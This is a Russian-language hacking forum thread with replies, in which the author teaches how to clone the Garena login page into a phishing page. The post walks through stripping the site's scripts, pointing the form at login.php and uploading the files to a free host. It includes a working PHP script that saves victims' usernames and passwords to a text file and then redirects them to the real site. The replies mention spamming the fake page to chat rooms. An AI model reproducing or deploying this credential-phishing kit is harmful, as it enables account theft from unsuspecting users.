Всем привет! Думал - наверняка многие ребята пытались брутить гарену(блин а че такое прокси?), качали фейк-клиенты(мда, и че такое сниффер? почему на мыло нифига не приходит?), бегали по раздачам... Надеюсь моя статья вам поможет научится добывать логины-пароли!
Ну для начала скажу - я не программист и языков сскриптов я не знаю, кулхацкером меня тоже не назовеш и научился делать все это я буквально за 4 часа.
Что нам понадобится:
1. рука, можно две..
2. чуток серого вещества
3. обычный блокнот(есть у всех)
4. браузер Opera(можно и другой, но я предпочитаю Оперу и вам советую!)
Итак заходим например на страничку [Ссылки могут видеть только зарегистрированные пользователи. ] .
Нажимаем правой клавишей по странице, жмем *Исходный Код* и появляется вкладка с хтмл кодом:
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
Выделяем самый первый символ кода и жмем Сtrl+F(поиск). Выскочит окошко с поиском по тексту.Ставим галочку *Искать ниже* и вписываем туда такое <script src="http://cdn.garenanow.com/webmain/static/js/number_format.js Начиная с <script src= до <div id="main"><div class="highlightForum"><h2>Login</h2><div class="registration"><fo выделяем и удаляем все(кто пользуется Оперой меня поймет - там два синих текста а между ними красный, его то мы и удалили.)[Ссылки могут видеть только зарегистрированные пользователи. ] Будьте ОЧЕНЬ акуратны, если удалите лишнии кавычки или символ - страница или не запустится или запустится криво. Ах да... Удаляем мы это потому что эти скрипты не дадут нам запустить фейк.
Это еще не все что нам нужно будет удалить. Далее я не буду писать как искать строчки - действуем или вручную или поиском. Выделяем все после Garena CIS (Russian) </option></select>, оставив только </body></html> в сааааамом конце кода.[Ссылки могут видеть только зарегистрированные пользователи. ][Ссылки могут видеть только зарегистрированные пользователи. ]
Строку <script type="text/javascript">
function setLocale(locale) {
window.location='http://intl.garena.com/process_change_locale/?locale='+locale;
}
</script> можно не удалять дабы страничка была более наполненой и реалистичной.
Вообщем теперь /заразим\ страничку нашим скриптом(об этом позже).
Опять выделяем первый символ кода и создаем поиск(Сtrl+F) ,вводим action=.Ищем(их там вроде несколько по тексту), и в каждом случае в action="#" то что в кавычках меняем на login.php. Выйдет так action="login.php".
Выделяем первый символ -- поиск method=. Если method="post" - ничего не меняем, если method="get" - меняем гет на пост.
Все со страницей закончили. Жмем в левом верхнем углу(опера) применить изменения и сохранить как index.htm(если предлогают по-другому - не соглашаемся и переименовываем).Лучше создайте отдельную папку гарена-фейк - это еще не единственное что мы туда кинем.
создаем файл в той же папке что и index.htm с именем login.php окрываем как текст и вписываем туда следующие:
Код:
<?PHP
$Login = $_POST['lUsername']; //тут вставляем то что копировали в начале страницы
$Pass = $_POST['lPasswordLabel']; //тут вставляем то что копировали в начале страницы
$c = "$Login:$Pass";
$fp = fopen("base.txt","a+"); //тут вписываем базу куда будут приходить пароли
fwrite($fp,"\n $c \n");
fclose($fp);
header("Location: http://garena.com/"); //куда пошлем пользователя после того как он ввел данные!
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://garena.com'></head></html>"; // Урл куда пашлете клиента...
?>
Ничего не меняйте, все уже проверено и работает.
Последнее что нам надо - создать в папке с index.htm и login.php пустой текстовый документ base.txt(оставляем пустым, тут будут приходить логины и пароли в формате логин:пароль).
Вот и все , мы готовы к последнему шагу - создать на бесплатном хосте фейк страничку и залить на фтп наши три файла.Вот они:
[Ссылки могут видеть только зарегистрированные пользователи. ]
Предлагаю [Ссылки могут видеть только зарегистрированные пользователи. ].
Извиняюсь надо бежать! Завтра опишу как залить на фтп, затестить, зарегить наш фейк на [Ссылки могут видеть только зарегистрированные пользователи. ] . Ну и раскажу как например кнопку Log In заменить на Получить 100500 шеллов))
Спасибо за внимание.
А лентяям скину уже готовыми эти три файла - останется только залить. by Godlike(zhy4ok) special for zhyk.ru
Последний раз редактировалось Zhу4ok; 25.06.2011 в 16:53.
[Ссылки могут видеть только зарегистрированные пользователи. ] ----посмотрите здесь, много бесплатных хостингов!
Времени на это если чесно сейчас вообще нет, вот создал за пару минут фейк страничку(чтобы перейти надо нажать на картинку): .
[Ссылки могут видеть только зарегистрированные пользователи. ]
Там какието ошибки в скрипте, не разбирался... Кому надо вот [Ссылки могут видеть только зарегистрированные пользователи. ]
Последний раз редактировалось Zhу4ok; 02.07.2011 в 14:05.
[Ссылки могут видеть только зарегистрированные пользователи. ] ----посмотрите здесь, много бесплатных хостингов!
Времени на это если чесно сейчас вообще нет, вот создал за пару минут фейк страничку(чтобы перейти надо нажать на картинку): .
[Ссылки могут видеть только зарегистрированные пользователи. ]
Там какието ошибки в скрипте, не разбирался... Кому надо вот [Ссылки могут видеть только зарегистрированные пользователи. ]
Цитата:
A chance to ban = 95-97%
Эту строку поправь
________________
Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Да эт я так написал, для демонстрации)) На такое никто не повелся, ток что спамил румы им -_-
А да и английский я не очень знаю, тупо вбил в гугл и подправил что смог
куда пароли и пассы должны приходить обьясните пожалуйста буду благодарен, а так три файла закинул страничка есть, токо пароли не приходят, в чем проблема?